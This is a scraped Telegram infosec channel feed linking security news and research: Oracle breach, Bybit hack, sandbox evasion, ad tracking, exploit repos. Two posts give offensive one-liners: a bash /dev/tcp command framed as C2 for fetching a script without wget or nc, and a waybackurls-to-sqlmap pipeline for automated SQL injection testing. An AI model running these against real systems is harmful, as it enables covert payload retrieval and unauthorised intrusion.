cKure Red
2.35K subscribers
70 photos
32 videos
21 files
447 links
The director's cut on critical feeds from InfoSec world 🌎

Main Channel: @cKure

β˜•οΈ or queries email us
πŸ“¨ i@ckure.org
Download Telegram
πŸ’Ž Sandbox evasions are a strange world: a tiny mouse jitter can decide the fate of a whole attack chain. CPR describes statistical attacks they launched on sandbox human interaction modules, then gives full mitigation, including exposition and source code.

Exploiting Statistical Weaknesses in Human Interaction Anti-Evasions.

https://research.checkpoint.com/2025/the-cat-and-mouse-game-exploiting-statistical-weaknesses-in-human-interaction-anti-evasions/
Please open Telegram to view this post
VIEW IN TELEGRAM
5️⃣ 1 liner bash for C2 without using any native program like wget, nc etc, esp containers.

bash-c "exec 3<>/dev/tcp/IP/80; echo -e GET/ youfile.sh HTTP/1.1\r\nHost; ip\r\nConnection: close\r\n\r\n' >&3; cat <&3-> yourfile.sh'

Source: Linkedin | Harvey Spec
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘Ž5
πŸ‡°πŸ‡΅Bybit hack technical analysis of the Hack by Lazarus group, North Korean state spinsored hacking group (as calimed by the FBI, United States πŸ‡ΊπŸ‡Έ).
Please open Telegram to view this post
VIEW IN TELEGRAM
🀩1
20250306_195000.jpg
558.9 KB
Ransomware Archive
🌐 Yet another website: sploitify.haxx.it [interactive public exploit cheat sheet]
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘1πŸ”₯1
πŸ“£ Oracle quietly confirms public cloud data breach, customer data stolen.

The attacker exploited a vulnerability in Oracle Access Manager to breach Oracle-hosted servers. The vulnerability is tracked as CVE-2021-35587 and was assigned a critical severity score 9.8/10. It was patched in mid-January 2022, raising questions over whether Oracle kept its own servers vulnerable to a flaw it fixed more than three years ago.

CrowdStrike is investigating the incident along FBI.


https://www.techradar.com/pro/security/oracle-quietly-confirms-public-cloud-data-breach-customer-data-stolen
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯31
πŸ”€ SQLMap from Waybackurls.

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

Credits: Zlatan H
Please open Telegram to view this post
VIEW IN TELEGRAM
3⚑1πŸ”₯1
πŸ“Everyone knows your location: Tracking myself down through in-app ads.

https://timsh.org/tracking-myself-down-through-in-app-ads/

πŸ“Everyone knows your location, Part 2: Try it yourself and share the results.

https://timsh.org/everyone-knows-your-location-part-2-try-it-yourself/

➿➿➿➿➿➿➿➿➿➿

analyse-ad-traffic l: A guide + python notebook that helps to collect, analyse and visualise requests sent by a mobile device while using some app.

https://github.com/tim-sha256/analyse-ad-traffic
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯4🀑1
πŸŸ₯Microsoft Zero-Day drop:
Server MS-TNAP Authentication Bypass [RCE 0day]
A critical 0-click remote authentication bypass vulnerability in Microsoft Telnet Server that allows attackers to gain access as any user, including Administrator, without requiring valid credentials. The vulnerability exploits a misconfiguration in the NTLM Authentication processes of the Telnet MS-TNAP extension allowing remote unauthenticated attackers to bypass authentication completely.


Unconfirmed code
https://github.com/hackerhouse-opensource/hfwintelnet
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯2πŸ‘1πŸ‘Œ11
🌐 Pwning the Ladybird browser.

https://jessie.cafe/posts/pwning-ladybirds-libjs/
Please open Telegram to view this post
VIEW IN TELEGRAM
✍1πŸ‘11